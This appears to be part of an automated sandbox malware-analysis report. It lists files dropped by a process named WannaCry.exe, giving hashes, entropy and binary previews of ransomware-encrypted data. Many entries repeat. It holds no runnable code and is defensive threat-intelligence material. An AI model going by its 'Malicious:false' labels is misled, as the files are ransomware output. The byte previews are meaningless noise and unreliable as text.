                                                                              Preview:WANACRY!..........J;8q.JR6.....hI..-...DU'....'...]8......H<...0.LB.*.<Z...kA....;x..W`...v.....e.?.?. ....=....(Q\.|.5.*'E.Kj...A....._....R...S.'.6....sz]....sB.N<.!q......[....../.....r....Mh.9.f.... ..Q.....f.9./......... ..#bF.%.i.J`._....F.Z..............%.aU...q...$..K..n..|.r.......!.Z........_..Q...'^!..o.M.=.d...E....y6>./<=......u] ..&.L.2\i.......u[.$.......q...$.gcr.J....a. .-`....0..^1...d........"9*......^)F.Z.5..>....E<..B...}.....p......2.C..P]y.).X ..X.......\"....j.J.e..g..;.wr;]..e>j..h.-.)$.Wb.E.e%.7.!..%...........-$.x.qE.eP}.#..K.w.s7f.Q..W'H....1.....k..u...a.j.14.c..}8m..B..J./....$..g.....8#...1.....2.......6..[].Bi4.~....L.P.;.......^Fz....u8?..;...%.......R.1.Dx...}..L..\..K..p.gP.6.4V.,)..Yfi.S.aA....|.....h...A.u/A.5..U.Q....=A.O..gm.-:...,...n.4.I.2..}....@.WG-.z:....M=.4sSo.g={H..g.&..Z\.r>.*...s..........KC}m.d...1."{....NA./p..fON..ymB..L.v.C../T.K.8.....~k$.L.9O.,.#.A.....bFB.|......9.....j6..q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831259923216846
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkvIsMyNF8xCteZTPCaloWxANka0axM7yu+AxS285R9vyf26lYb3Tb/nJak9:bkgsM1MteZTLlRokdaxUS28f96flMP/z
                                                                              MD5:46314D3F08C866B6781E410318D196D0
                                                                              SHA1:65D39C5FE37F66F3DF0C70D7F29B51C2AB9193F5
                                                                              SHA-256:62FD0F205E2FF91A4CCC193A9300BB1D01535B3F96919E87CC07F2D678EDEE85
                                                                              SHA-512:FC0EC6142A878338637D91AAAE181FB906B34CB80E36FA62C6B763C1159748D4D17A59EB261517C6FFFE6182057A5723A321BF25EBC3BC2928C2EC052CE63E63
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....z.X.'....\.<;.L*.K.....c+:YY../);...z.VNK...-I5kyvD.(........J.y,....a...U|...1`.-U.IL.C...o2#....Wo...DX...}'.L..?.=.*.yh.=QL.t......^KC@O..E.Hc+...W..f.....,...'...0...p[...%......7pz..b.0&+nb..+...~f.E/..k...Yb]uM.D.I......{....4.kP..p...............~...$,..\w..m3./.9.......rm.....0J.'A..17.*.A......j|.t..(..C#..n..P..6O.p.........3X...P.y60..].9(...of#?....b)...........#.....4...H.N2Y._...H.K.1.J.iW.:..w...=r.|....N..JX.9..o.......r"*tD.N.6z8.JT-.<.0.Y.|s|5`K.5..r...7...%..5...._RX.S.....:.L..~Fq......O.......AN1.....X...3..O..eQ....>+Ny.?P.%.H..........M-..C/..$...?.YJ..q+DN......v.W.*.k...X.uM..0..C.a....+.S....A~N%u ..u7....q.@.<_.(..}.....B.l.RB.. ..~..{.}..0Y..(x;9....B......}:. &..N(B..4..u...L...9........`.......|x.......D.&.!....Zg_.Il.o...zB....KH..L..E.......0...q..7..9.e..}/...]j._...x.$.G.....0.V....yQ.E..p2......s.k..eZ.V..@[G..^..`U.!......Jp..ih.J9...-X.l:=.'="..3uKg|..+.{..X....Xh ...yo.':.G.B...|.iE...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831259923216846
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkvIsMyNF8xCteZTPCaloWxANka0axM7yu+AxS285R9vyf26lYb3Tb/nJak9:bkgsM1MteZTLlRokdaxUS28f96flMP/z
                                                                              MD5:46314D3F08C866B6781E410318D196D0
                                                                              SHA1:65D39C5FE37F66F3DF0C70D7F29B51C2AB9193F5
                                                                              SHA-256:62FD0F205E2FF91A4CCC193A9300BB1D01535B3F96919E87CC07F2D678EDEE85
                                                                              SHA-512:FC0EC6142A878338637D91AAAE181FB906B34CB80E36FA62C6B763C1159748D4D17A59EB261517C6FFFE6182057A5723A321BF25EBC3BC2928C2EC052CE63E63
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....z.X.'....\.<;.L*.K.....c+:YY../);...z.VNK...-I5kyvD.(........J.y,....a...U|...1`.-U.IL.C...o2#....Wo...DX...}'.L..?.=.*.yh.=QL.t......^KC@O..E.Hc+...W..f.....,...'...0...p[...%......7pz..b.0&+nb..+...~f.E/..k...Yb]uM.D.I......{....4.kP..p...............~...$,..\w..m3./.9.......rm.....0J.'A..17.*.A......j|.t..(..C#..n..P..6O.p.........3X...P.y60..].9(...of#?....b)...........#.....4...H.N2Y._...H.K.1.J.iW.:..w...=r.|....N..JX.9..o.......r"*tD.N.6z8.JT-.<.0.Y.|s|5`K.5..r...7...%..5...._RX.S.....:.L..~Fq......O.......AN1.....X...3..O..eQ....>+Ny.?P.%.H..........M-..C/..$...?.YJ..q+DN......v.W.*.k...X.uM..0..C.a....+.S....A~N%u ..u7....q.@.<_.(..}.....B.l.RB.. ..~..{.}..0Y..(x;9....B......}:. &..N(B..4..u...L...9........`.......|x.......D.&.!....Zg_.Il.o...zB....KH..L..E.......0...q..7..9.e..}/...]j._...x.$.G.....0.V....yQ.E..p2......s.k..eZ.V..@[G..^..`U.!......Jp..ih.J9...-X.l:=.'="..3uKg|..+.{..X....Xh ...yo.':.G.B...|.iE...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846439580643875
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkkXAiDqYR1Ouk5iX/l1ZXZB+Dypx1b6Nnq2edZe+ziZNGFmIRTgEy5rk/me+5XW:bk1iDTO7qzZXZB+DyBO4bziZiVRXy5r0
                                                                              MD5:CF577E42355E64BAEC706EB0F2E16951
                                                                              SHA1:9E7934BC43C9A04EB029D42CA5C5920BDFE48A6B
                                                                              SHA-256:543A844E81B6F332FCAE23E3997D3D3E907CE87360DB8930CA0C0BEAE278611F
                                                                              SHA-512:DC96416F9E0BD13195E77B7AD4C5380CA0A0BC9DEF7DD740E1929757E09F7BA3FDBD190FD02A02A4A75CC906586C8FFC023971AB0963BDAF42B833649C81A21E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....h.5....x...Y....4..^.f...=.[...;...%.QE.0.....&.n..S..W.`...k..ri.XE...Z.,K}..f....|..I5..pg?.C-.@..MW...&....c.y..6.Q.l.H...@...V9.,Q..BK.2...............o...}.f2..3.~......|...'.....epA}.P&o/.........p%..>v..<...}.I.n.?F.m.)...f.ijW..4.e..............DH...M..F;.mwhd.....u....R.....8...+.M3.o..H.....r.h..?L}...*k%.B.8}m..,.S..YC}(....*.K.g$..\.y]..MJ<k.pi.....D|.\4.7......#.[y.pv..KT:..,.....+Y...o,. ....T...d..go&.'\.&.C..I[...wO....."....U.vP.7h..2\._..L.1a..t.2.J...=..*q ..c..EJ....CC.:.....JwK1.Hi..^......4..H.t.f..$.SO...z...+?..p..DAyX.....L...6....<....L...w(.,.=..te&..Fp.\(..aE......g...JB|...&..?..5.4..)<.,.Jo])x...JH,..7.........L4.......~..1...m..W..f>..~.Mg._.....t.=..J...q....Hb*.iu`..N_'YD.m.C....Elz.Zd}&...}.O=.V}...;.....[ q3i..0.......Z......... ...!.e..t.x.........w]..!8..).A.Re.e......t..oo....\_=..i8V...m..S..'(.H........<.J...0X u.....7+d..v...{.!.}...^..B..v}0.D..'.y...G.}.S........@u .g..E...6...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846439580643875
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkkXAiDqYR1Ouk5iX/l1ZXZB+Dypx1b6Nnq2edZe+ziZNGFmIRTgEy5rk/me+5XW:bk1iDTO7qzZXZB+DyBO4bziZiVRXy5r0
                                                                              MD5:CF577E42355E64BAEC706EB0F2E16951
                                                                              SHA1:9E7934BC43C9A04EB029D42CA5C5920BDFE48A6B
                                                                              SHA-256:543A844E81B6F332FCAE23E3997D3D3E907CE87360DB8930CA0C0BEAE278611F
                                                                              SHA-512:DC96416F9E0BD13195E77B7AD4C5380CA0A0BC9DEF7DD740E1929757E09F7BA3FDBD190FD02A02A4A75CC906586C8FFC023971AB0963BDAF42B833649C81A21E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....h.5....x...Y....4..^.f...=.[...;...%.QE.0.....&.n..S..W.`...k..ri.XE...Z.,K}..f....|..I5..pg?.C-.@..MW...&....c.y..6.Q.l.H...@...V9.,Q..BK.2...............o...}.f2..3.~......|...'.....epA}.P&o/.........p%..>v..<...}.I.n.?F.m.)...f.ijW..4.e..............DH...M..F;.mwhd.....u....R.....8...+.M3.o..H.....r.h..?L}...*k%.B.8}m..,.S..YC}(....*.K.g$..\.y]..MJ<k.pi.....D|.\4.7......#.[y.pv..KT:..,.....+Y...o,. ....T...d..go&.'\.&.C..I[...wO....."....U.vP.7h..2\._..L.1a..t.2.J...=..*q ..c..EJ....CC.:.....JwK1.Hi..^......4..H.t.f..$.SO...z...+?..p..DAyX.....L...6....<....L...w(.,.=..te&..Fp.\(..aE......g...JB|...&..?..5.4..)<.,.Jo])x...JH,..7.........L4.......~..1...m..W..f>..~.Mg._.....t.=..J...q....Hb*.iu`..N_'YD.m.C....Elz.Zd}&...}.O=.V}...;.....[ q3i..0.......Z......... ...!.e..t.x.........w]..!8..).A.Re.e......t..oo....\_=..i8V...m..S..'(.H........<.J...0X u.....7+d..v...{.!.}...^..B..v}0.D..'.y...G.}.S........@u .g..E...6...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842972412956774
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdOAjELgehP3w4KlQBOF5amYzH2XBOvs3pbDP0jb/oNc:bkdjqKe+amYqxC69Pe/oNc
                                                                              MD5:CD9DF48CA873952AFC443D36293B695F
                                                                              SHA1:87E4DF2AD007F56336E8F916BC1BA6FD44BBB2D3
                                                                              SHA-256:EBB97EF0E43322BD36BD3FC08B2BE196F90BE232C5EF50262796ACF8C02B0883
                                                                              SHA-512:4B4F032E6C2F02D5379C2D0D8A6FE593D73E0545244118C75DB637ABDAFF12DB7DA76A1C2EC29A6D6076E308B7ED586701C2DCA3E7F0F4268FBF1FC6A0047B4F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....~,%....n.(..I.p1..../M...*.N.......Y..S1N..U....q....Y......$op....%.X...Q..........,q..J~u{..|.ey.... .tEN......!.\.........].&..P....z....../L..8{./e...[.fH.".@G.5...n3...[.1vw.4.Ma..GSs.......X7.`....K..].r....3M.i..x..........q...KEW4QT.-..............q%.{.6.DP...RR.5...."U.O..^.-.8.~..W....z....5I.Q;....7........E.c...8..`.G.'.U.}:.?...4..-A.t5...T!Z.....K0@.,..rX|.0,.@J.......T2..f,..-.S>...B.J.O...C..L./....:.>.....P..W.....t.9.H.<.....Kc...gcT.C.qC.H.h/.".!...3fz.D...._MM.C./xf...Jfp.$/..e`....g..t......R.<.b.YM#...P...W.j.%.^....yY+9)s.v.._#.....y..z....el.j.P..L.<.....Fb.r3..Z.L..o.78..4......H.....+..SSr.y!..rw:.p.....51+.......\....*&.....4....9_.ll..O4..e7C............M.E.e.}I....D...6'1}..#|7..R.....w...o...g_.h.G..%...@...C......A^....L.e.....'.)4E%5.=....e.4.k......yb.=.....M.+{...Y?...T..D....I. .uC....d.........O..@......_..F...u...S.5'.....}..pIoJ't..BN.. A..gKR..>..(.cli.22.............~..WF.{....y.?..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842972412956774
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdOAjELgehP3w4KlQBOF5amYzH2XBOvs3pbDP0jb/oNc:bkdjqKe+amYqxC69Pe/oNc
                                                                              MD5:CD9DF48CA873952AFC443D36293B695F
                                                                              SHA1:87E4DF2AD007F56336E8F916BC1BA6FD44BBB2D3
                                                                              SHA-256:EBB97EF0E43322BD36BD3FC08B2BE196F90BE232C5EF50262796ACF8C02B0883
                                                                              SHA-512:4B4F032E6C2F02D5379C2D0D8A6FE593D73E0545244118C75DB637ABDAFF12DB7DA76A1C2EC29A6D6076E308B7ED586701C2DCA3E7F0F4268FBF1FC6A0047B4F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....~,%....n.(..I.p1..../M...*.N.......Y..S1N..U....q....Y......$op....%.X...Q..........,q..J~u{..|.ey.... .tEN......!.\.........].&..P....z....../L..8{./e...[.fH.".@G.5...n3...[.1vw.4.Ma..GSs.......X7.`....K..].r....3M.i..x..........q...KEW4QT.-..............q%.{.6.DP...RR.5...."U.O..^.-.8.~..W....z....5I.Q;....7........E.c...8..`.G.'.U.}:.?...4..-A.t5...T!Z.....K0@.,..rX|.0,.@J.......T2..f,..-.S>...B.J.O...C..L./....:.>.....P..W.....t.9.H.<.....Kc...gcT.C.qC.H.h/.".!...3fz.D...._MM.C./xf...Jfp.$/..e`....g..t......R.<.b.YM#...P...W.j.%.^....yY+9)s.v.._#.....y..z....el.j.P..L.<.....Fb.r3..Z.L..o.78..4......H.....+..SSr.y!..rw:.p.....51+.......\....*&.....4....9_.ll..O4..e7C............M.E.e.}I....D...6'1}..#|7..R.....w...o...g_.h.G..%...@...C......A^....L.e.....'.)4E%5.=....e.4.k......yb.=.....M.+{...Y?...T..D....I. .uC....d.........O..@......_..F...u...S.5'.....}..pIoJ't..BN.. A..gKR..>..(.cli.22.............~..WF.{....y.?..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859175967132278
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3Dgy0X4Gmaq2vzjxSQSpRKfY2k5jvYUny1zxm7KedVl7jdoDWR5L:bk3Dgyq4Gma/3wLp0fBk5Ds+KedXRTL
                                                                              MD5:5BE1F5D04222B94CD097F8F33DC3F2D2
                                                                              SHA1:6D08448C23515CBEFDC8BD5AD33F6171E3DCFC29
                                                                              SHA-256:784C4858F8236916E10CB177A83FC91EC766C9F0585FD5DB903E99335D02DE3F
                                                                              SHA-512:DF02487A5580BC3E0C48B0EA05D263D20A868A8C862986DE45085CC6E17248640782C3057315EAC7EEAA0C36EE41DC9CEE296CEB65562054F9F0AB25F32C7EDA
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Z.J..:....B.gA'6L=0C....o...LD.N....g..u..!z`..2|"....;....[....%.!....v....U.L......|.0...We...b......c.C..;..Y.....W.)X...Dv.o"%'.."...X@..JY..}...n.]NX.#..9ff<O.[.......j.hY f.... ^:.........u....MildGC..v../6...Z..;...p~2.]Q.d.].....I..............;7.bb`.p..E7...$ret.?\3.d.LM....P.T..X.n.U.>:.2.R.....K.W.#..Y....*......pW..-..m..-...3.C.J.;..a..... .fdt.D(-.Z..x...nL.Y./|c..:`...7.%.i.i>~s.&o.. { Cb.\.hVH...@...>.5.../...`.l..2[k..A.B..X...I.Sp.p{8.$..X!.........:...nAB..Lt.?.R.}..{v.e].:1..x.7.}.6+..........P.S(....R;._....g.c.Ofm4...:ir..8f.r...*..Q8..>3.C.z}...%..[......M....n^.H.Q.......S.....7D.......1G8U.S.H[&..&..v.1.b...Q.!t....)..].5..?..x?..._.6H........<...X.(....*iy..ZM..3J4..f.MA<a.\9 ..[..i.....a...[.+!./.E.....s!.......^..q.......\......5x_o.........Y...../...Q.bG.r..j.w.......~...9....K........c#`[.".. ..<.*.*.|B...19.@..kni.Y..E.0.f.x.C3.M.7qY.$...2..N;....|9..#...1._....*..>.8tc....].20....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859175967132278
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3Dgy0X4Gmaq2vzjxSQSpRKfY2k5jvYUny1zxm7KedVl7jdoDWR5L:bk3Dgyq4Gma/3wLp0fBk5Ds+KedXRTL
                                                                              MD5:5BE1F5D04222B94CD097F8F33DC3F2D2
                                                                              SHA1:6D08448C23515CBEFDC8BD5AD33F6171E3DCFC29
                                                                              SHA-256:784C4858F8236916E10CB177A83FC91EC766C9F0585FD5DB903E99335D02DE3F
                                                                              SHA-512:DF02487A5580BC3E0C48B0EA05D263D20A868A8C862986DE45085CC6E17248640782C3057315EAC7EEAA0C36EE41DC9CEE296CEB65562054F9F0AB25F32C7EDA
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Z.J..:....B.gA'6L=0C....o...LD.N....g..u..!z`..2|"....;....[....%.!....v....U.L......|.0...We...b......c.C..;..Y.....W.)X...Dv.o"%'.."...X@..JY..}...n.]NX.#..9ff<O.[.......j.hY f.... ^:.........u....MildGC..v../6...Z..;...p~2.]Q.d.].....I..............;7.bb`.p..E7...$ret.?\3.d.LM....P.T..X.n.U.>:.2.R.....K.W.#..Y....*......pW..-..m..-...3.C.J.;..a..... .fdt.D(-.Z..x...nL.Y./|c..:`...7.%.i.i>~s.&o.. { Cb.\.hVH...@...>.5.../...`.l..2[k..A.B..X...I.Sp.p{8.$..X!.........:...nAB..Lt.?.R.}..{v.e].:1..x.7.}.6+..........P.S(....R;._....g.c.Ofm4...:ir..8f.r...*..Q8..>3.C.z}...%..[......M....n^.H.Q.......S.....7D.......1G8U.S.H[&..&..v.1.b...Q.!t....)..].5..?..x?..._.6H........<...X.(....*iy..ZM..3J4..f.MA<a.\9 ..[..i.....a...[.+!./.E.....s!.......^..q.......\......5x_o.........Y...../...Q.bG.r..j.w.......~...9....K........c#`[.".. ..<.*.*.|B...19.@..kni.Y..E.0.f.x.C3.M.7qY.$...2..N;....|9..#...1._....*..>.8tc....].20....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851342351360175
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkixqtBqRMlJ6ENEwkmGOysHv2UeGZ9yr6Opskui/5HQ8+BwcTxtnoYEc0:bkixo3NEwvGOy0eGZ986OBMT1Tf30
                                                                              MD5:FBEB02665FC00CE14606524F3DE9BE2A
                                                                              SHA1:501A840B56714DD6F58AFAAB1407E2756E4E2686
                                                                              SHA-256:7E166A77A52C7F6549A685B4442DCAC5AFFFFA4EC9782F73D8AA4B9C95B246E2
                                                                              SHA-512:AC422C6BCE8B8A1D0C89DD3DC4B2857F815CC433FEE20F73563937C1DDB489C0BEB7E3F080FEF324774DC832A87B477CE8BF3ECD2BCCB09F6D03A2D41CE8F56D
                                                                              Malicious:false
                                                                              Preview:WANACRY!...........{..b.Hf..WC."k.....o...m"B.......H/.......]..Uk.PTp..Uz_...+...#..z.4>......S...|.G.R..;.a.j!.G..X.._$.@...>-.........k.U|,i..@.>^....A...p.....dw5s+.g .*........F....vM.L......y.p...A...+#.aL!...Y..Lx....9)R.3.?./]..5.4A....>.R?4.A..?_..............j.S(.x...4=d..__...|.2<:^.#.7~..9...Q...-.,..v.....Z..6...W:...=v..&9../.O..2$~....'..5..b%....{g..e.I.6x..a.UEh>u%.P.......~...<-}k@$._M...v..O..=..H.C..%..).tz...V.........z_..@..X..aa....u.]..3.qQ.......p.Cya1.4.....].....t.M..#..(._.-.z..V.s.s^-......B=i.....g^..hC.$.r.4...#..a.0.#u.V.t.rRec. ...$.a........ .+h.Z...l!...(.;..W.. .).`...w.b...U...[.q.......>..fnb(..1.C6...y.;.N.)e.T8....>.~..T.;..,...;x..."..........-...y.;,....7j......&.a-...[k.p.....Y....|..H...4to.u.>-.....N5.S.5.".y.I$.".!P.>.U....J......{l..yk.,..(.lw}[n.f..v...7..6C...m..G..FqJ.ko...-.-..0Kk.{.....[:..-...\X.#8!{.;<..uRT].qp......D.+HTSb..x...9....d..\m.2.=..{d\U.....('.lMt-..........!*..P|u..ka..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851342351360175
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkixqtBqRMlJ6ENEwkmGOysHv2UeGZ9yr6Opskui/5HQ8+BwcTxtnoYEc0:bkixo3NEwvGOy0eGZ986OBMT1Tf30
                                                                              MD5:FBEB02665FC00CE14606524F3DE9BE2A
                                                                              SHA1:501A840B56714DD6F58AFAAB1407E2756E4E2686
                                                                              SHA-256:7E166A77A52C7F6549A685B4442DCAC5AFFFFA4EC9782F73D8AA4B9C95B246E2
                                                                              SHA-512:AC422C6BCE8B8A1D0C89DD3DC4B2857F815CC433FEE20F73563937C1DDB489C0BEB7E3F080FEF324774DC832A87B477CE8BF3ECD2BCCB09F6D03A2D41CE8F56D
                                                                              Malicious:false
                                                                              Preview:WANACRY!...........{..b.Hf..WC."k.....o...m"B.......H/.......]..Uk.PTp..Uz_...+...#..z.4>......S...|.G.R..;.a.j!.G..X.._$.@...>-.........k.U|,i..@.>^....A...p.....dw5s+.g .*........F....vM.L......y.p...A...+#.aL!...Y..Lx....9)R.3.?./]..5.4A....>.R?4.A..?_..............j.S(.x...4=d..__...|.2<:^.#.7~..9...Q...-.,..v.....Z..6...W:...=v..&9../.O..2$~....'..5..b%....{g..e.I.6x..a.UEh>u%.P.......~...<-}k@$._M...v..O..=..H.C..%..).tz...V.........z_..@..X..aa....u.]..3.qQ.......p.Cya1.4.....].....t.M..#..(._.-.z..V.s.s^-......B=i.....g^..hC.$.r.4...#..a.0.#u.V.t.rRec. ...$.a........ .+h.Z...l!...(.;..W.. .).`...w.b...U...[.q.......>..fnb(..1.C6...y.;.N.)e.T8....>.~..T.;..,...;x..."..........-...y.;,....7j......&.a-...[k.p.....Y....|..H...4to.u.>-.....N5.S.5.".y.I$.".!P.>.U....J......{l..yk.,..(.lw}[n.f..v...7..6C...m..G..FqJ.ko...-.-..0Kk.{.....[:..-...\X.#8!{.;<..uRT].qp......D.+HTSb..x...9....d..\m.2.=..{d\U.....('.lMt-..........!*..P|u..ka..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.868552800582624
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkkD340eL+bj48hDxFMAcLF98SKaD0XNdP0zu9kK9TbwN2Yz3rozoJIVFrKDRH3C:bkkD3+GDPMAcLkSKxYu9kKdO2YPozIIn
                                                                              MD5:29E1423F180726556CAFF95D77C82CAE
                                                                              SHA1:974FD879587DF3AEE186C5D07B16D58740770C7B
                                                                              SHA-256:60C516C1BE4A80DE55C133BAFA5394F4FC64E79189DAC1DFC90C80AE45031A56
                                                                              SHA-512:961F7BE6C371339566A631255C8F368742B43EF15BC7D65F42ABC8954CEA22C030A124B81BE8A2736E6EF1ED2BBCF1ABC67302C9A3F94127FD3E4AAB0187FF00
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....j.SN..KR....RAN9.....w.......-..S.@..Oq/.6T.R....(.....4`.d2y...i<...].~.x..d.T8.h9..W#&gr..=/c.0+.Q./......O...H.H)._.....).5.z...,8.T...1.Ez"L..K...Sh..^.......6.../.m.....F.........{.B...<...rh._...&.y..iN..`.dy.H.x..U}"e\#.W.g.0......N..s.G.............mq.n.N....pFY.........)../p(S......2Q.6.Rx3U.]....i........'.......<}AF.u.Of.%Ng.t.....~...4..l.b.[w.......3.|..4.,\..N.......iKe...p..:3...3....s ...7.5...8.. ...}N...i....$NOY0e6..!]...u.......P...D.....Zb\W...i.]....=..Zy...?..n.:y.?Af..S.FJ"x5.x./.LH....e/:..9..D.6.7.Y.....#..]..n.....T...3_6v;+....k[.._.7]^.x.4........m;....kvE...!V..8...X....%..+..p.....<m_c...Q..&..4>.J....0.u[..>.]...n..t)...y..~.qP..2....T.05......s........A<.M. ..7.I...{.u..n1d...(...].Q...J....dN....M*$p.b....G.K%l-.L.........g... a..........=Z...{.u.mx.^...\j.K....(.T.....}......,i.H1.f...\.k..-.....F..f^f..Q.8{R.X.?.X.....hq.".D(....L.....A(N..G....u."3..E...I.`O..L.(..<.a.zPZ.b.....1:8.......+..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.868552800582624
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkkD340eL+bj48hDxFMAcLF98SKaD0XNdP0zu9kK9TbwN2Yz3rozoJIVFrKDRH3C:bkkD3+GDPMAcLkSKxYu9kKdO2YPozIIn
                                                                              MD5:29E1423F180726556CAFF95D77C82CAE
                                                                              SHA1:974FD879587DF3AEE186C5D07B16D58740770C7B
                                                                              SHA-256:60C516C1BE4A80DE55C133BAFA5394F4FC64E79189DAC1DFC90C80AE45031A56
                                                                              SHA-512:961F7BE6C371339566A631255C8F368742B43EF15BC7D65F42ABC8954CEA22C030A124B81BE8A2736E6EF1ED2BBCF1ABC67302C9A3F94127FD3E4AAB0187FF00
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....j.SN..KR....RAN9.....w.......-..S.@..Oq/.6T.R....(.....4`.d2y...i<...].~.x..d.T8.h9..W#&gr..=/c.0+.Q./......O...H.H)._.....).5.z...,8.T...1.Ez"L..K...Sh..^.......6.../.m.....F.........{.B...<...rh._...&.y..iN..`.dy.H.x..U}"e\#.W.g.0......N..s.G.............mq.n.N....pFY.........)../p(S......2Q.6.Rx3U.]....i........'.......<}AF.u.Of.%Ng.t.....~...4..l.b.[w.......3.|..4.,\..N.......iKe...p..:3...3....s ...7.5...8.. ...}N...i....$NOY0e6..!]...u.......P...D.....Zb\W...i.]....=..Zy...?..n.:y.?Af..S.FJ"x5.x./.LH....e/:..9..D.6.7.Y.....#..]..n.....T...3_6v;+....k[.._.7]^.x.4........m;....kvE...!V..8...X....%..+..p.....<m_c...Q..&..4>.J....0.u[..>.]...n..t)...y..~.qP..2....T.05......s........A<.M. ..7.I...{.u..n1d...(...].Q...J....dN....M*$p.b....G.K%l-.L.........g... a..........=Z...{.u.mx.^...\j.K....(.T.....}......,i.H1.f...\.k..-.....F..f^f..Q.8{R.X.?.X.....hq.".D(....L.....A(N..G....u."3..E...I.`O..L.(..<.a.zPZ.b.....1:8.......+..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.868622252862646
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkpd2eNLfKyJo5e4WdpA7luYwOlHe6rq2uRu1noJc6cqYyW64LsOFPKpub6:bkpd2CDJSe/ghPlH3rMu1nUc6cqrW640
                                                                              MD5:8CF17E798B1951F3726AA13422250D01
                                                                              SHA1:0630411AF7683AE2A3DD316AD27C787D83D74793
                                                                              SHA-256:5F51BFFD723E2D0E53D747994D36259B2F6D53EA5FD8D4924F1F908DE546FBD5
                                                                              SHA-512:62D19AC2C8DB56064D3EA13166D1E37C568C7E448DD8EE72D8CF6ECDB0E2EB809BA19CFB6EB1DBCD978EA4A4519EFFDDFAE0E9666C62133D59A302A89CD8644E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H"..5.#..n.....3D..........?...}P...7.]....3..&.-9.q....%4..{...X.a.AL....*....y.,....N.....f../eK%7. ..sR..U.Tbi..G..L<idv.o......T[.O.lE.N...f..g.....j.i./......>R.#.@6.....x...^..6...!.0.*.9.1I..Co:.|.......A...Q.ih<. ..a.,b...v..3.erUOa.[2.!.G.............j..V..U..).r...+.y..y..xC.c.pSk.Na.k..x.z....rM..E..&+....d..*.O>.@E.6;K_5_... .t.Mb.X`..0.6.......p.y.g....2d.Z^.....R2D..gh/Ju....l..H...PR.s....a}b..$G.F...4u.o..U.o.......BG.y..Km.C.j!9..4..?.?...fh...].j....U.....Q............(......plUuf..S/_..S./s..2..d."...M.ctz.....D..Y8.W!..9X,...<6.....+x..X...*....@.B..a..C..H0./..@.j.$Xx..~.u.<z..m..w7..z;.@..nV-.t.i/i..iz.;OqP...rQ..~.![.0....2.^]...N.3`.mq/<.:*....!\(+.([..X.@w?...V..TK.{DLW...n..Hl...f%...M./C..".vNJ.....!...N.`..V.TB;.U'%<........7.K...m.#yk:.gj.O..,.d|....Sp.Z.......#..% ....0l....=\*PK3l<..z.P.#E..W?.X..a}....]U......K[.Ar..-.:......h..x..".....Q.....;a....H)0............./. &.u..d.?.....l}.7J.#.p..\...S
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.868622252862646
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkpd2eNLfKyJo5e4WdpA7luYwOlHe6rq2uRu1noJc6cqYyW64LsOFPKpub6:bkpd2CDJSe/ghPlH3rMu1nUc6cqrW640
                                                                              MD5:8CF17E798B1951F3726AA13422250D01
                                                                              SHA1:0630411AF7683AE2A3DD316AD27C787D83D74793
                                                                              SHA-256:5F51BFFD723E2D0E53D747994D36259B2F6D53EA5FD8D4924F1F908DE546FBD5
